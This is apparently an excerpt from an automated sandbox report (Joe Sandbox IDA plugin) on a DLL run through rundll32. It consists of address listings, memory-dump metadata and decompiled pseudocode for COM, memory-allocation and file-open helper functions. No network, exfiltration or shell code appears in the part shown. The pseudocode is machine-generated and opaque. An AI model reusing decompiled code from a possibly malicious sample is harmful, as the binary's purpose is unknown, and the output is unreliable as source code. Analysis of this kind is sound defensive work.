                                                                                                            0x1002c340
                                                                                                            0x1002c340
                                                                                                            0x1002c32b
                                                                                                            0x1002c336
                                                                                                            0x1002c33b
                                                                                                            0x1002c33b
                                                                                                            0x1002c347
                                                                                                            0x1002c34b
                                                                                                            0x1002c34f
                                                                                                            0x1002c352
                                                                                                            0x1002c355
                                                                                                            0x1002c358
                                                                                                            0x1002c35b
                                                                                                            0x1002c35f
                                                                                                            0x1002c366
                                                                                                            0x1002c369
                                                                                                            0x1002c372
                                                                                                            0x1002c37a
                                                                                                            0x1002c386
                                                                                                            0x1002c38b
                                                                                                            0x1002c38e
                                                                                                            0x1002c392
                                                                                                            0x1002c398
                                                                                                            0x1002c399
                                                                                                            0x1002c39a
                                                                                                            0x1002c39b
                                                                                                            0x1002c39c
                                                                                                            0x1002c39f
                                                                                                            0x1002c39f
                                                                                                            0x1002c3a2
                                                                                                            0x1002c3a5
                                                                                                            0x1002c3ab
                                                                                                            0x1002c3ab
                                                                                                            0x1002c35b
                                                                                                            0x1002c312
                                                                                                            0x1002c3b0
                                                                                                            0x1002c3b5
                                                                                                            0x1002c3be
                                                                                                            0x1002c3be
                                                                                                            0x1002c3c1
                                                                                                            0x1002c3c3
                                                                                                            0x1002c3c5
                                                                                                            0x1002c3ca
                                                                                                            0x1002c3cd
                                                                                                            0x1002c3d3
                                                                                                            0x1002c3d8
                                                                                                            0x1002c3dc
                                                                                                            0x1002c3dd
                                                                                                            0x1002c3cd
                                                                                                            0x1002c3e1
                                                                                                            0x1002c3e6
                                                                                                            0x1002c3eb
                                                                                                            0x1002c3ee
                                                                                                            0x1002c3f1
                                                                                                            0x1002c3f6
                                                                                                            0x1002c3fd
                                                                                                            0x1002c400
                                                                                                            0x1002c409
                                                                                                            0x1002c417
                                                                                                            0x1002c425
                                                                                                            0x1002c42c
                                                                                                            0x1002c44b
                                                                                                            0x1002c44b
                                                                                                            0x1002c450
                                                                                                            0x1002c453
                                                                                                            0x1002c453
                                                                                                            0x1002c453
                                                                                                            0x1002c453
                                                                                                            0x1002c458
                                                                                                            0x1002c45b
                                                                                                            0x1002c460
                                                                                                            0x1002c464
                                                                                                            0x1002c467
                                                                                                            0x1002c467
                                                                                                            0x1002c46d
                                                                                                            0x1002c46e
                                                                                                            0x1002c473
                                                                                                            0x1002c211
                                                                                                            0x1002c1ed
                                                                                                            0x1002c478
                                                                                                            0x1002c48d
                                                                                                            0x1002c49a
                                                                                                            0x1002c4a5
                                                                                                            0x1002c4b3
                                                                                                            0x1002c4b8
                                                                                                            0x1002c4c1
                                                                                                            0x1002c4c3
                                                                                                            0x1002c4c3
                                                                                                            0x1002c4c6
                                                                                                            0x1002c4cc
                                                                                                            0x1002c4ce
                                                                                                            0x1002c4ce
                                                                                                            0x1002c4d1
                                                                                                            0x1002c4d7
                                                                                                            0x1002c4dc
                                                                                                            0x1002c4e0

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Rect$Empty$Window
                                                                                                            • String ID: @
                                                                                                            • API String ID: 444217639-2766056989
                                                                                                            • Opcode ID: 0f88fdd43cf5bce15e433ab0bc4ef339b59204e985663dc88836f237ddcb939b
                                                                                                            • Instruction ID: 58262607db454327f65a07b4950f04bdf16dc99993eabd06514925c449a16dc0
                                                                                                            • Opcode Fuzzy Hash: 0f88fdd43cf5bce15e433ab0bc4ef339b59204e985663dc88836f237ddcb939b
                                                                                                            • Instruction Fuzzy Hash: 11C13972D00209DFCB05CFA8D994EAEB7F5FF48350F518569E815AB251DB34AE05CB60
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 80%
                                                                                                            			E1000E14F(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi) {
                                                                                                            				intOrPtr _t130;
                                                                                                            				intOrPtr* _t133;
                                                                                                            				intOrPtr* _t140;
                                                                                                            				intOrPtr* _t143;
                                                                                                            				intOrPtr _t144;
                                                                                                            				signed int _t146;
                                                                                                            				intOrPtr* _t147;
                                                                                                            				void* _t149;
                                                                                                            				intOrPtr* _t153;
                                                                                                            				signed int _t158;
                                                                                                            				intOrPtr _t159;
                                                                                                            				intOrPtr* _t161;
                                                                                                            				intOrPtr* _t163;
                                                                                                            				intOrPtr* _t165;
                                                                                                            				intOrPtr* _t166;
                                                                                                            				intOrPtr _t169;
                                                                                                            				intOrPtr* _t170;
                                                                                                            				intOrPtr* _t172;
                                                                                                            				intOrPtr _t174;
                                                                                                            				signed int _t178;
                                                                                                            				signed int _t180;
                                                                                                            				signed int _t186;
                                                                                                            				signed int _t188;
                                                                                                            				intOrPtr* _t190;
                                                                                                            				intOrPtr* _t192;
                                                                                                            				intOrPtr _t196;
                                                                                                            				intOrPtr _t198;
                                                                                                            				intOrPtr* _t199;
                                                                                                            				void* _t200;
                                                                                                            				intOrPtr _t213;
                                                                                                            				intOrPtr* _t215;
                                                                                                            				intOrPtr* _t261;
                                                                                                            				void* _t263;
                                                                                                            
                                                                                                            				E10011BF0(0x1003af36, _t263);
                                                                                                            				_t130 =  *0x1004c470; // 0x6edecb8c
                                                                                                            				_t261 = __ecx;
                                                                                                            				 *((intOrPtr*)(_t263 - 0x10)) = _t130;
                                                                                                            				 *((intOrPtr*)(_t263 - 0x88)) =  *((intOrPtr*)(__ecx + 0x14));
                                                                                                            				 *((intOrPtr*)(_t263 - 0x80)) =  *((intOrPtr*)(__ecx + 0x10));
                                                                                                            				if( *((intOrPtr*)(__ecx + 0x48)) == 0) {
                                                                                                            					_t133 =  *((intOrPtr*)(__ecx + 8));
                                                                                                            					if(_t133 != 0) {
                                                                                                            						_push(_t263 - 0x7c);
                                                                                                            						_push(_t263 - 0x78);
                                                                                                            						_push(0x10043008);
                                                                                                            						_push(_t133);
                                                                                                            						if( *((intOrPtr*)( *_t133 + 0xc))() >= 0) {
                                                                                                            							E1000B1A4(_t263 - 0x70, 0x10043744);
                                                                                                            							 *(_t263 - 0x50) =  *(_t263 - 0x50) | 0xffffffff;
                                                                                                            							 *((intOrPtr*)(_t263 - 0x58)) = 0;
                                                                                                            							 *((intOrPtr*)(_t263 - 0x54)) = 0;
                                                                                                            							 *((intOrPtr*)(_t263 - 0x4c)) = 0x18;
                                                                                                            							 *((intOrPtr*)(_t263 - 0x48)) = 0;
                                                                                                            							 *((intOrPtr*)(_t263 - 0x44)) = 0x1fb;
                                                                                                            							E1000B1A4(_t263 - 0x40, 0x1004372c);
                                                                                                            							_t140 =  *((intOrPtr*)(_t263 - 0x78));
                                                                                                            							 *(_t263 - 0x20) =  *(_t263 - 0x20) | 0xffffffff;
                                                                                                            							 *((intOrPtr*)(_t263 - 0x28)) = 0x1c;
                                                                                                            							 *((intOrPtr*)(_t263 - 0x24)) = 0;
                                                                                                            							 *((intOrPtr*)(_t263 - 0x1c)) = 0x20;
                                                                                                            							 *((intOrPtr*)(_t263 - 0x18)) = 0;
                                                                                                            							 *((intOrPtr*)(_t263 - 0x14)) = 0x1e;
                                                                                                            							_t196 =  *((intOrPtr*)( *_t140 + 0x10))(_t140, 2, _t263 - 0x70, 0x28, 0);
                                                                                                            							if(_t196 >= 0) {
                                                                                                            								 *(_t263 - 0xa0) =  *(_t263 - 0x7c);
                                                                                                            								_t143 =  *((intOrPtr*)(_t263 - 0x78));
                                                                                                            								 *((intOrPtr*)(_t263 - 0x9c)) = 1;
                                                                                                            								 *(_t263 - 0x98) = 0;
                                                                                                            								 *((intOrPtr*)(_t263 - 0x94)) = 0;
                                                                                                            								 *((intOrPtr*)(_t263 - 0x90)) = 0;
                                                                                                            								_t144 =  *((intOrPtr*)( *_t143 + 0x18))(_t143, 0, 0, _t263 - 0xa0);
                                                                                                            								 *((intOrPtr*)(_t263 - 0x84)) = _t144;
                                                                                                            								if(_t144 >= 0) {
                                                                                                            									 *(_t261 + 0x14) =  *(_t263 - 0x98);
                                                                                                            									_t146 =  *(_t263 - 0x8c);
                                                                                                            									 *(_t263 - 0x7c) = _t146;
                                                                                                            									 *(_t261 + 0x10) = _t146;
                                                                                                            									_t147 =  *((intOrPtr*)(_t263 - 0x78));
                                                                                                            									 *((intOrPtr*)(_t261 + 0x34)) =  *((intOrPtr*)(_t263 - 0x94));
                                                                                                            									 *((intOrPtr*)( *_t147 + 8))(_t147);
                                                                                                            									goto L23;
                                                                                                            								} else {
                                                                                                            									_t161 =  *((intOrPtr*)(_t263 - 0x78));
                                                                                                            									 *((intOrPtr*)( *_t161 + 8))(_t161);
                                                                                                            								}
                                                                                                            								goto L41;
                                                                                                            							} else {
                                                                                                            								_t163 =  *((intOrPtr*)(_t263 - 0x78));
                                                                                                            								 *((intOrPtr*)( *_t163 + 8))(_t163);
                                                                                                            								_t134 = _t196;
                                                                                                            							}
                                                                                                            						}
                                                                                                            					} else {
                                                                                                            						_t134 = 0;
                                                                                                            					}
                                                                                                            				} else {
                                                                                                            					_t165 =  *((intOrPtr*)(__ecx + 0x4c));
                                                                                                            					_t134 =  *((intOrPtr*)( *_t165 + 0x14))(_t165, 0x10043228, _t263 - 0x74);
                                                                                                            					 *((intOrPtr*)(_t263 - 0x84)) = _t134;
                                                                                                            					if(_t134 >= 0) {
                                                                                                            						_t166 =  *((intOrPtr*)(_t263 - 0x74));
                                                                                                            						_push(_t263 - 0x7c);
                                                                                                            						_push(0x10043208);
                                                                                                            						_push(_t166);
                                                                                                            						if( *((intOrPtr*)( *_t166))() >= 0) {
                                                                                                            							_t186 =  *(_t263 - 0x7c);
                                                                                                            							_push(_t263 - 0x78);
                                                                                                            							_push(0x10043348);
                                                                                                            							 *((intOrPtr*)(_t263 - 0x78)) = 0;
                                                                                                            							_push(_t186);
                                                                                                            							if( *((intOrPtr*)( *_t186 + 0x10))() >= 0) {
                                                                                                            								_t190 =  *((intOrPtr*)(_t263 - 0x78));
                                                                                                            								 *((intOrPtr*)( *_t190 + 0x14))(_t190,  *((intOrPtr*)(__ecx + 4)) + 0xe4, __ecx + 0x58);
                                                                                                            								_t192 =  *((intOrPtr*)(_t263 - 0x78));
                                                                                                            								 *((intOrPtr*)( *_t192 + 8))(_t192);
                                                                                                            							}
                                                                                                            							_t188 =  *(_t263 - 0x7c);
                                                                                                            							 *((intOrPtr*)( *_t188 + 8))(_t188);
                                                                                                            						}
                                                                                                            						if(E1001F77E(0x14) == 0) {
                                                                                                            							_t169 = 0;
                                                                                                            						} else {
                                                                                                            							_t169 = E1000D069(_t168,  *((intOrPtr*)(_t263 - 0x74)));
                                                                                                            						}
                                                                                                            						 *((intOrPtr*)(_t261 + 0x50)) = _t169;
                                                                                                            						_t170 =  *((intOrPtr*)(_t263 - 0x74));
                                                                                                            						 *((intOrPtr*)( *_t170 + 8))(_t170);
                                                                                                            						_t172 =  *((intOrPtr*)(_t261 + 0x50));
                                                                                                            						_t229 =  *_t172;
                                                                                                            						if( *_t172 != 0) {
                                                                                                            							E1000B427(_t229, _t172 + 4);
                                                                                                            						}
                                                                                                            						if(E1001F77E(0x28) == 0) {
                                                                                                            							_t174 = 0;
                                                                                                            						} else {
                                                                                                            							_t174 = E10009E9C(_t173, 0, 0x1f40);
                                                                                                            						}
                                                                                                            						 *((intOrPtr*)(_t261 + 0x54)) = _t174;
                                                                                                            						E1000DB7F(_t174);
                                                                                                            						 *((intOrPtr*)( *((intOrPtr*)(_t261 + 0x50)) + 8)) =  *((intOrPtr*)(_t261 + 0x54));
                                                                                                            						_t178 =  *( *((intOrPtr*)(_t261 + 0x54)) + 0xc);
                                                                                                            						 *(_t261 + 0x10) = _t178;
                                                                                                            						_t180 = _t178 + _t178 * 4 << 3;
                                                                                                            						__imp__CoTaskMemAlloc(_t180,  *((intOrPtr*)( *((intOrPtr*)(_t261 + 0x50)))));
                                                                                                            						 *(_t261 + 0x14) = _t180;
                                                                                                            						E10011C50(_t180, 0,  *(_t261 + 0x10) +  *(_t261 + 0x10) * 4 << 3);
                                                                                                            						E1000DA69( *((intOrPtr*)(_t261 + 0x50)));
                                                                                                            						E1000B3E4( *((intOrPtr*)(_t261 + 0x50)));
                                                                                                            						L23:
                                                                                                            						 *((intOrPtr*)(_t263 - 0x74)) = 0;
                                                                                                            						if( *(_t261 + 0x10) > 0) {
                                                                                                            							_t200 = 0;
                                                                                                            							do {
                                                                                                            								_t158 = E1001F77E(0x1c);
                                                                                                            								 *(_t263 - 0x7c) = _t158;
                                                                                                            								 *(_t263 - 4) = 0;
                                                                                                            								if(_t158 == 0) {
                                                                                                            									_t159 = 0;
                                                                                                            								} else {
                                                                                                            									_t159 = E1001E0EA(_t158, 0xa);
                                                                                                            								}
                                                                                                            								 *(_t263 - 4) =  *(_t263 - 4) | 0xffffffff;
                                                                                                            								 *((intOrPtr*)(_t263 - 0x74)) =  *((intOrPtr*)(_t263 - 0x74)) + 1;
                                                                                                            								 *((intOrPtr*)(_t200 +  *(_t261 + 0x14) + 0x24)) = _t159;
                                                                                                            								_t200 = _t200 + 0x28;
                                                                                                            							} while ( *((intOrPtr*)(_t263 - 0x74)) <  *(_t261 + 0x10));
                                                                                                            						}
                                                                                                            						_t198 =  *((intOrPtr*)(_t263 - 0x88));
                                                                                                            						if(_t198 != 0) {
                                                                                                            							if( *((intOrPtr*)(_t263 - 0x80)) > 0) {
                                                                                                            								_t149 = 0xffffffdc;
                                                                                                            								_t199 = _t198 + 0x24;
                                                                                                            								 *((intOrPtr*)(_t263 - 0x74)) =  *((intOrPtr*)(_t263 - 0x80));
                                                                                                            								 *(_t263 - 0x7c) = _t149 -  *((intOrPtr*)(_t263 - 0x88));
                                                                                                            								while(1) {
                                                                                                            									_t213 =  *((intOrPtr*)( *_t199 + 4));
                                                                                                            									 *((intOrPtr*)(_t263 - 0x80)) = _t213;
                                                                                                            									if(_t213 == 0) {
                                                                                                            										goto L37;
                                                                                                            									}
                                                                                                            									while(1) {
                                                                                                            										_t153 = E10006D96(_t263 - 0x80);
                                                                                                            										 *((intOrPtr*)( *_t261 + 8))( *_t153, 1);
                                                                                                            										if( *((intOrPtr*)(_t263 - 0x80)) == 0) {
                                                                                                            											goto L37;
                                                                                                            										}
                                                                                                            									}
                                                                                                            									L37:
                                                                                                            									E1001E047( *_t199);
                                                                                                            									_t215 =  *_t199;
                                                                                                            									if(_t215 != 0) {
                                                                                                            										 *((intOrPtr*)( *_t215 + 4))(1);
                                                                                                            									}
                                                                                                            									_t199 = _t199 + 0x28;
                                                                                                            									_t122 = _t263 - 0x74;
                                                                                                            									 *_t122 =  *((intOrPtr*)(_t263 - 0x74)) - 1;
                                                                                                            									if( *_t122 != 0) {
                                                                                                            										continue;
                                                                                                            									}
                                                                                                            									goto L40;
                                                                                                            								}
                                                                                                            							}
                                                                                                            							L40:
                                                                                                            							__imp__CoTaskMemFree( *((intOrPtr*)(_t263 - 0x88)));
                                                                                                            						}
                                                                                                            						L41:
                                                                                                            						_t134 =  *((intOrPtr*)(_t263 - 0x84));
                                                                                                            					}
                                                                                                            				}
                                                                                                            				 *[fs:0x0] =  *((intOrPtr*)(_t263 - 0xc));
                                                                                                            				return E100117AE(_t134,  *((intOrPtr*)(_t263 - 0x10)));
                                                                                                            			}




































                                                                                                            0x1000e3d5
                                                                                                            0x1000e3d8
                                                                                                            0x1000e3da
                                                                                                            0x1000e3dc
                                                                                                            0x1000e3de
                                                                                                            0x1000e3e4
                                                                                                            0x1000e3e9
                                                                                                            0x1000e3ec
                                                                                                            0x1000e3f9
                                                                                                            0x1000e3ee
                                                                                                            0x1000e3f2
                                                                                                            0x1000e3f2
                                                                                                            0x1000e3fb
                                                                                                            0x1000e402
                                                                                                            0x1000e405
                                                                                                            0x1000e40c
                                                                                                            0x1000e40f
                                                                                                            0x1000e3dc
                                                                                                            0x1000e414
                                                                                                            0x1000e41c
                                                                                                            0x1000e421
                                                                                                            0x1000e428
                                                                                                            0x1000e429
                                                                                                            0x1000e432
                                                                                                            0x1000e435
                                                                                                            0x1000e43d
                                                                                                            0x1000e43f
                                                                                                            0x1000e444
                                                                                                            0x1000e447
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1000e44e
                                                                                                            0x1000e45b
                                                                                                            0x1000e469
                                                                                                            0x1000e46f
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1000e44b
                                                                                                            0x1000e471
                                                                                                            0x1000e473
                                                                                                            0x1000e478
                                                                                                            0x1000e47c
                                                                                                            0x1000e482
                                                                                                            0x1000e482
                                                                                                            0x1000e485
                                                                                                            0x1000e488
                                                                                                            0x1000e488
                                                                                                            0x1000e48b
                                                                                                            0x00000000
                                                                                                            0x1000e43a
                                                                                                            0x00000000
                                                                                                            0x1000e48b
                                                                                                            0x1000e43d
                                                                                                            0x1000e48d
                                                                                                            0x1000e493
                                                                                                            0x1000e493
                                                                                                            0x1000e499
                                                                                                            0x1000e499
                                                                                                            0x1000e499
                                                                                                            0x1000e1a0
                                                                                                            0x1000e4a4
                                                                                                            0x1000e4b5

                                                                                                            APIs
                                                                                                            • __EH_prolog.LIBCMT ref: 1000E154
                                                                                                            • CoTaskMemAlloc.OLE32(?,?,?,00000000), ref: 1000E27B
                                                                                                            • CoTaskMemFree.OLE32(?,?,00000000), ref: 1000E493
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Task$AllocFreeH_prolog
                                                                                                            • String ID:
                                                                                                            • API String ID: 1522537378-3916222277
                                                                                                            • Opcode ID: 55d795966de13a0ea59a72e0495c25d6dadcc295acfdf2e5faf40e97609b2b6a
                                                                                                            • Instruction ID: e4bcf968e0ea1d6695bf60cb4aa7b1ca6ea302c548195cc232f4004078e55fdd
                                                                                                            • Opcode Fuzzy Hash: 55d795966de13a0ea59a72e0495c25d6dadcc295acfdf2e5faf40e97609b2b6a
                                                                                                            • Instruction Fuzzy Hash: AAC11874A006489FDB24CFA8C884AAEBBF5FF88344F20465DE155EB256DB71AD45CF10
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 54%
                                                                                                            			E1000B6F5(void* __ecx) {
                                                                                                            				intOrPtr* _t76;
                                                                                                            				intOrPtr* _t101;
                                                                                                            				intOrPtr* _t103;
                                                                                                            				intOrPtr* _t105;
                                                                                                            				intOrPtr* _t107;
                                                                                                            				intOrPtr* _t143;
                                                                                                            				void* _t146;
                                                                                                            				void* _t148;
                                                                                                            
                                                                                                            				E10011BF0(0x1003ae9f, _t148);
                                                                                                            				_t146 = __ecx;
                                                                                                            				_t76 =  *((intOrPtr*)(__ecx + 0x4c));
                                                                                                            				_push(_t148 - 0x14);
                                                                                                            				_push(0x10043128);
                                                                                                            				 *((intOrPtr*)(_t148 - 0x14)) = 0;
                                                                                                            				_push(_t76);
                                                                                                            				 *((intOrPtr*)(_t148 - 0x18)) = 0;
                                                                                                            				if( *((intOrPtr*)( *_t76))() >= 0) {
                                                                                                            					 *((intOrPtr*)(_t148 - 0x7c)) = __ecx + 0xc4;
                                                                                                            					 *((intOrPtr*)(_t148 - 0x74)) = __ecx + 0xd4;
                                                                                                            					 *((intOrPtr*)(_t148 - 0x70)) = __ecx + 0xd8;
                                                                                                            					 *((intOrPtr*)(_t148 - 0x80)) = 0x40;
                                                                                                            					 *((intOrPtr*)(_t148 - 0x78)) = 0;
                                                                                                            					 *((intOrPtr*)(_t148 - 0x5c)) = 0;
                                                                                                            					 *((intOrPtr*)(_t148 - 0x50)) = 0;
                                                                                                            					 *((intOrPtr*)(_t148 - 0x4c)) = 0;
                                                                                                            					E10010592(_t148 - 0x28);
                                                                                                            					_t143 =  *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x1c)) + 0x1c));
                                                                                                            					 *((intOrPtr*)(_t148 - 4)) = 0;
                                                                                                            					 *(_t148 - 0x6c) = 0;
                                                                                                            					 *((intOrPtr*)(_t148 - 0x10)) = 0;
                                                                                                            					do {
                                                                                                            						 *((intOrPtr*)( *_t143 + 0x104))(_t146,  *((intOrPtr*)( *((intOrPtr*)(_t148 - 0x10)) + 0x10040560)), _t148 - 0x28);
                                                                                                            						if( *((intOrPtr*)(_t148 - 0x20)) != 0) {
                                                                                                            							 *(_t148 - 0x6c) =  *(_t148 - 0x6c) |  *( *((intOrPtr*)(_t148 - 0x10)) + 0x10040564);
                                                                                                            						}
                                                                                                            						 *((intOrPtr*)(_t148 - 0x10)) =  *((intOrPtr*)(_t148 - 0x10)) + 8;
                                                                                                            					} while ( *((intOrPtr*)(_t148 - 0x10)) < 0x40);
                                                                                                            					 *((intOrPtr*)( *_t143 + 0x104))(_t146, 0xfffffd40, _t148 - 0x28);
                                                                                                            					 *((intOrPtr*)(_t148 - 0x68)) =  *((intOrPtr*)(_t148 - 0x20));
                                                                                                            					 *((intOrPtr*)( *_t143 + 0x104))(_t146, 0xfffffd43, _t148 - 0x28);
                                                                                                            					 *((intOrPtr*)(_t148 - 0x64)) =  *((intOrPtr*)(_t148 - 0x20));
                                                                                                            					 *((intOrPtr*)( *_t143 + 0x104))(_t146, 0xfffffd34, _t148 - 0x28);
                                                                                                            					 *((intOrPtr*)(_t148 - 0x58)) =  *((short*)(_t148 - 0x20));
                                                                                                            					 *((intOrPtr*)( *_t143 + 0x104))(_t146, 0xfffffd3f, _t148 - 0x28);
                                                                                                            					 *((intOrPtr*)(_t148 - 0x54)) =  *((intOrPtr*)(_t148 - 0x20));
                                                                                                            					 *((intOrPtr*)( *_t143 + 0x104))(_t146, 0xfffffd41, _t148 - 0x28);
                                                                                                            					_t101 =  *((intOrPtr*)(_t148 - 0x20));
                                                                                                            					_push(_t148 - 0x60);
                                                                                                            					_push(0x10043178);
                                                                                                            					_push(_t101);
                                                                                                            					if( *((intOrPtr*)( *_t101))() < 0) {
                                                                                                            						 *((intOrPtr*)(_t148 - 0x60)) = 0;
                                                                                                            					}
                                                                                                            					_t103 =  *((intOrPtr*)(_t148 - 0x14));
                                                                                                            					_push(_t148 - 0x40);
                                                                                                            					_push(_t148 - 0x80);
                                                                                                            					 *((intOrPtr*)(_t148 - 0x40)) = 0x18;
                                                                                                            					_push(_t103);
                                                                                                            					if( *((intOrPtr*)( *_t103 + 0xc))() >= 0) {
                                                                                                            						 *((intOrPtr*)(_t146 + 0x6c)) =  *((intOrPtr*)(_t148 - 0x3c));
                                                                                                            						 *((intOrPtr*)(_t146 + 0x5c)) =  *((intOrPtr*)(_t148 - 0x34));
                                                                                                            						 *((intOrPtr*)(_t146 + 0x60)) =  *((intOrPtr*)(_t148 - 0x30));
                                                                                                            						 *((intOrPtr*)(_t148 - 0x18)) = 1;
                                                                                                            					}
                                                                                                            					_t105 =  *((intOrPtr*)(_t148 - 0x14));
                                                                                                            					 *((intOrPtr*)( *_t105 + 8))(_t105);
                                                                                                            					_t107 =  *((intOrPtr*)(_t148 - 0x60));
                                                                                                            					if(_t107 != 0) {
                                                                                                            						 *((intOrPtr*)( *_t107 + 8))(_t107);
                                                                                                            					}
                                                                                                            					__imp__#9(_t148 - 0x28);
                                                                                                            				}
                                                                                                            				 *[fs:0x0] =  *((intOrPtr*)(_t148 - 0xc));
                                                                                                            				return  *((intOrPtr*)(_t148 - 0x18));
                                                                                                            			}












                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ClearH_prologVariant
                                                                                                            • String ID: @$@
                                                                                                            • API String ID: 1166855276-149943524
                                                                                                            • Opcode ID: e890f0e6bb8d7fafe3cff4ca8cca7ae2ad4144aa324fa51ad2fccd96fbd137c1
                                                                                                            • Instruction ID: d7a2f0cc547cc5a266f2ab8e80424e9948fc94c4121f0c35bce9c1610e35d146
                                                                                                            • Opcode Fuzzy Hash: e890f0e6bb8d7fafe3cff4ca8cca7ae2ad4144aa324fa51ad2fccd96fbd137c1
                                                                                                            • Instruction Fuzzy Hash: D551D4B1A002199FDB04CFA9C8889EEBBF9FF48314F14456EE506EB250E774A941CF60
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 98%
                                                                                                            			E10025A6D(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags, CHAR* _a4, signed int _a8, intOrPtr _a12) {
                                                                                                            				intOrPtr _v8;
                                                                                                            				char _v268;
                                                                                                            				struct _SECURITY_ATTRIBUTES _v280;
                                                                                                            				void* __ebp;
                                                                                                            				intOrPtr _t40;
                                                                                                            				signed int _t43;
                                                                                                            				signed int _t51;
                                                                                                            				signed int _t53;
                                                                                                            				long _t58;
                                                                                                            				void* _t60;
                                                                                                            				void* _t69;
                                                                                                            				signed int _t73;
                                                                                                            				long _t79;
                                                                                                            				long _t81;
                                                                                                            				void* _t83;
                                                                                                            				signed int _t86;
                                                                                                            				intOrPtr _t87;
                                                                                                            
                                                                                                            				_t40 =  *0x1004c470; // 0x6edecb8c
                                                                                                            				_t83 = __ecx;
                                                                                                            				 *(__ecx + 8) =  *(__ecx + 8) & 0x00000000;
                                                                                                            				 *(__ecx + 4) =  *(__ecx + 4) | 0xffffffff;
                                                                                                            				_t85 = __ecx + 0xc;
                                                                                                            				_v8 = _t40;
                                                                                                            				_t73 = _a8 & 0xffff7fff;
                                                                                                            				E10006935(_t73, __ecx + 0xc);
                                                                                                            				if(lstrlenA(_a4) >= 0x104 || E1002592C(_t73, _t83, _t85,  &_v268, _a4) == 0) {
                                                                                                            					L30:
                                                                                                            					_t43 = 0;
                                                                                                            					goto L31;
                                                                                                            				} else {
                                                                                                            					E10006AEC(_t85,  &_v268);
                                                                                                            					_t81 = 3;
                                                                                                            					_t51 = _t73 & _t81;
                                                                                                            					_a8 = 0;
                                                                                                            					if(_t51 == 0) {
                                                                                                            						_a8 = 0x80000000;
                                                                                                            					} else {
                                                                                                            						_t69 = _t51 - 1;
                                                                                                            						if(_t69 == 0) {
                                                                                                            							_a8 = 0x40000000;
                                                                                                            						} else {
                                                                                                            							if(_t69 == 1) {
                                                                                                            								_a8 = 0xc0000000;
                                                                                                            							}
                                                                                                            						}
                                                                                                            					}
                                                                                                            					_t53 = _t73 & 0x00000070;
                                                                                                            					_t86 = 1;
                                                                                                            					if(_t53 == 0 || _t53 == 0x10) {
                                                                                                            						L13:
                                                                                                            						_t81 = 0;
                                                                                                            						goto L14;
                                                                                                            					} else {
                                                                                                            						if(_t53 == 0x20) {
                                                                                                            							_t81 = _t86;
                                                                                                            							L14:
                                                                                                            							_v280.nLength = 0xc;
                                                                                                            							_v280.lpSecurityDescriptor = 0;
                                                                                                            							_v280.bInheritHandle =  !(_t73 >> 7) & _t86;
                                                                                                            							if((_t73 & 0x00000010) == 0) {
                                                                                                            								_t58 = 3;
                                                                                                            							} else {
                                                                                                            								asm("sbb eax, eax");
                                                                                                            								_t58 = ( ~(_t73 & 0x00002000) & 0x00000002) + 2;
                                                                                                            							}
                                                                                                            							_t79 = 0x80;
                                                                                                            							if((_t73 & 0x00010000) != 0) {
                                                                                                            								_t79 = 0x20000080;
                                                                                                            							}
                                                                                                            							if((_t73 & 0x00020000) != 0) {
                                                                                                            								_t79 = _t79 | 0x80000000;
                                                                                                            							}
                                                                                                            							if((_t73 & 0x00040000) != 0) {
                                                                                                            								_t79 = _t79 | 0x10000000;
                                                                                                            							}
                                                                                                            							if((_t73 & 0x00080000) != 0) {
                                                                                                            								_t79 = _t79 | 0x08000000;
                                                                                                            							}
